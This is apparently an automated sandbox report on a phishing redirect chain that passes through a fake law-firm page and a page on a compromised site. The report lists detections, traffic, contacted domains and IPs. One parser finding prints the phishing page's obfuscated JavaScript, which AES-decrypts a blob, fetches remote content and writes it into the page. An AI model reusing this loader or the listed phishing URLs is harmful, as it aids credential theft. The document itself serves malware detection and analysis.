Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://go.skimresources.com/?id=129857X1600501&url=https%3A%2F%2Fys-law-firm.jimdosite.com

Overview

General Information

Sample URL:	https://go.skimresources.com/?id=129857X1600501&url=https%3A%2F%2Fys-law-firm.jimdosite.com
Analysis ID:	1551128
Infos:

Detection

HTMLPhisher

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish70

Yara detected Phisher

HTML body contains low number of good links

HTML page contains hidden javascript code

HTML title does not match URL

Stores files to the Windows start menu directory

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 6848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1952,i,9071713603347835982,5416741935579266113,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.skimresources.com/?id=129857X1600501&url=https%3A%2F%2Fys-law-firm.jimdosite.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_99	JoeSecurity_Phisher_2	Yara detected Phisher	Joe Security
dropped/chromecache_90	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security

HTML

Source	Rule	Description	Author	Strings
3.4.pages.csv	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security
3.5.pages.csv	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish70

Source: Yara match	File source: 3.4.pages.csv, type: HTML
Source: Yara match	File source: 3.5.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_90, type: DROPPED

Yara detected Phisher

Source: Yara match

File source: dropped/chromecache_99, type: DROPPED

Source: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41

HTTP Parser: Number of links: 0

Source: https://ys-law-firm.jimdosite.com/

HTTP Parser: Base64 decoded: 1730985724.000000

Source: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41

HTTP Parser: Title: Vintage Motor Collectors - freeisbeautifulo.ru does not match URL

Source: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41

HTTP Parser: async function zombie(yarrow) { var {a,b,c,d} = json.parse(yarrow); return cryptojs.aes.decrypt(a,cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher:cryptojs.algo.sha512, keysize:64/8, iterations: 999}), {iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async functionhaggler() {document.write(awaitzombie(await (awaitfetch(awaitzombie(atob(`eyjhijoisefyxc9fwklouulfanveug5hzvwvsvfjxc8yyxjscvdjwgrewfwvt24rsepwdgc9iiwiyyi6imi2njkzmdk1otmwn2izyzuwzmzkogi0ytdmmze3y2zjiiwiyii6immxnjczzjkwnwvmngm5owyxogjmztyzmdu3nmvmzjhhnmnhotexmddmmdnlndc0ntk0ntlmmmm5m2uwmwi2ztq2nzy1yzc0y2m5ztezotu2ngmxotuyy2q0m2jjmzkzy2m1mty5otg0mtljnmflyjjmzdg2mgvjm2ywyjezmge5oweyyjzimze2nzjmndq0mdazogfjmtkxnjbmzdvhndhkn2uxmjnmywezngmzmtjkmtk3y2u4ngewodhlmjbhngflyweznwfjogyxzmuxytuwodm3yjewyzqwzmqyntnlytdkmthmnjuzoda3ymm1mjzkoti3nmrlmze1mtnjmdyxyjm3mdexzdazyjhhyznimmfjzdg5nzy1ztc3zgqxzmm1mjdmmzy4zjizmjqzzjdiztfknjhizta4oda3oti2njm5otnjnjvhzjjiotc3njk4nzzjnjhhy2iyo...

Source: https://www.primechoicefinance.com.au/dykjj.php	HTTP Parser: No favicon
Source: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41	HTTP Parser: No favicon
Source: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41	HTTP Parser: No favicon
Source: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41	HTTP Parser: No favicon

Source: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41

HTTP Parser: No <meta name="author".. found

Source: https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49744 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 27MB

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: go.skimresources.com
Source: global traffic	DNS traffic detected: DNS query: ys-law-firm.jimdosite.com
Source: global traffic	DNS traffic detected: DNS query: jimdo-dolphin-static-assets-prod.freetls.fastly.net
Source: global traffic	DNS traffic detected: DNS query: fonts.jimstatic.com
Source: global traffic	DNS traffic detected: DNS query: jimdo-storage.freetls.fastly.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: at.prod.jimdo.systems
Source: global traffic	DNS traffic detected: DNS query: www.primechoicefinance.com.au
Source: global traffic	DNS traffic detected: DNS query: carpetcleaningmanitoba.ca
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: img1.wsimg.com
Source: global traffic	DNS traffic detected: DNS query: events.api.secureserver.net
Source: global traffic	DNS traffic detected: DNS query: csp.secureserver.net
Source: global traffic	DNS traffic detected: DNS query: freeisbeautifulo.ru
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49744 version: TLS 1.2

Source: classification engine

Classification label: mal56.phis.win@22/40@54/267

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1952,i,9071713603347835982,5416741935579266113,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.skimresources.com/?id=129857X1600501&url=https%3A%2F%2Fys-law-firm.jimdosite.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1952,i,9071713603347835982,5416741935579266113,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Extra Window Memory Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://go.skimresources.com/?id=129857X1600501&url=https%3A%2F%2Fys-law-firm.jimdosite.com	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jimdo-dolphin-static-assets-prod.freetls.fastly.net	151.101.2.79	true	false		unknown
carpetcleaningmanitoba.ca	107.180.47.58	true	false		unknown
jsdelivr.map.fastly.net	151.101.129.229	true	false		high
go.skimresources.com	35.190.25.30	true	false		unknown
at.prod.jimdo.systems	54.73.104.6	true	false		unknown
cdnjs.cloudflare.com	104.17.25.14	true	false		high
jimdo-storage.freetls.fastly.net	151.101.2.79	true	false		unknown
challenges.cloudflare.com	104.18.95.41	true	false		high
www.google.com	172.217.16.196	true	false		high
freeisbeautifulo.ru	104.21.59.220	true	false		unknown
primechoicefinance.com.au	122.201.80.182	true	false		unknown
img1.wsimg.com	unknown	unknown	false		high
events.api.secureserver.net	unknown	unknown	false		high
cdn.jsdelivr.net	unknown	unknown	false		high
csp.secureserver.net	unknown	unknown	false		unknown
fonts.jimstatic.com	unknown	unknown	false		unknown
ys-law-firm.jimdosite.com	unknown	unknown	false		unknown
www.primechoicefinance.com.au	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.primechoicefinance.com.au/dykjj.php	false		unknown
https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41	false		unknown
https://ys-law-firm.jimdosite.com/	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
107.180.47.58	carpetcleaningmanitoba.ca	United States		26496	AS-26496-GO-DADDY-COM-LLCUS	false
142.250.185.78	unknown	United States		15169	GOOGLEUS	false
104.102.33.222	unknown	United States		16625	AKAMAI-ASUS	false
151.101.129.229	jsdelivr.map.fastly.net	United States		54113	FASTLYUS	false
173.194.76.84	unknown	United States		15169	GOOGLEUS	false
104.18.94.41	unknown	United States		13335	CLOUDFLARENETUS	false
104.18.41.38	unknown	United States		13335	CLOUDFLARENETUS	false
54.73.104.6	at.prod.jimdo.systems	United States		16509	AMAZON-02US	false
2.19.96.48	unknown	European Union		20940	AKAMAI-ASN1EU	false
35.190.25.30	go.skimresources.com	United States		15169	GOOGLEUS	false
2.23.209.161	unknown	European Union		1273	CWVodafoneGroupPLCEU	false
2.23.209.167	unknown	European Union		1273	CWVodafoneGroupPLCEU	false
162.159.128.70	unknown	United States		13335	CLOUDFLARENETUS	false
142.250.74.195	unknown	United States		15169	GOOGLEUS	false
142.250.186.99	unknown	United States		15169	GOOGLEUS	false
142.250.184.195	unknown	United States		15169	GOOGLEUS	false
104.17.24.14	unknown	United States		13335	CLOUDFLARENETUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
23.38.98.114	unknown	United States		16625	AKAMAI-ASUS	false
2.18.64.8	unknown	European Union		6057	AdministracionNacionaldeTelecomunicacionesUY	false
172.217.16.206	unknown	United States		15169	GOOGLEUS	false
104.18.95.41	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
151.101.2.79	jimdo-dolphin-static-assets-prod.freetls.fastly.net	United States		54113	FASTLYUS	false
122.201.80.182	primechoicefinance.com.au	Australia		38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
151.101.130.79	unknown	United States		54113	FASTLYUS	false
104.21.59.220	freeisbeautifulo.ru	United States		13335	CLOUDFLARENETUS	false
172.67.184.149	unknown	United States		13335	CLOUDFLARENETUS	false
151.101.66.79	unknown	United States		54113	FASTLYUS	false
172.217.16.196	www.google.com	United States		15169	GOOGLEUS	false
104.17.25.14	cdnjs.cloudflare.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1551128
Start date and time:	2024-11-07 14:21:29 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://go.skimresources.com/?id=129857X1600501&url=https%3A%2F%2Fys-law-firm.jimdosite.com
